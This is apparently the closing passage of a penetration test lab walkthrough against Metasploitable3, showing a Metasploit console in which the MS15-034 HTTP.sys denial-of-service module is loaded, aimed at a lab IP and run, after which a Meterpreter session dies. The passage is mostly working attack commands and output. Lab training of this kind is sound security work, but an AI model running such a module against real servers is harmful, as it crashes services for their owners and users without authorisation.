Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf6 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > show options    # show the required options
Module options (auxiliary/dos/http/ms15_034_ulonglongadd):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.22.20    # set the target IP address
rhosts => 192.168.22.20
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run    # execute
[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) >
[*] 192.168.22.20 - Meterpreter session 2 closed. Reason: Died
[At this point the Metasploitable3 penetration test lab is complete]